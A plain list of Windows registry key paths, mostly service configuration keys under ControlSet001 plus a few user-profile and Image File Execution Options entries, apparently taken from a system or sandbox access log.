HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ObjectName
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
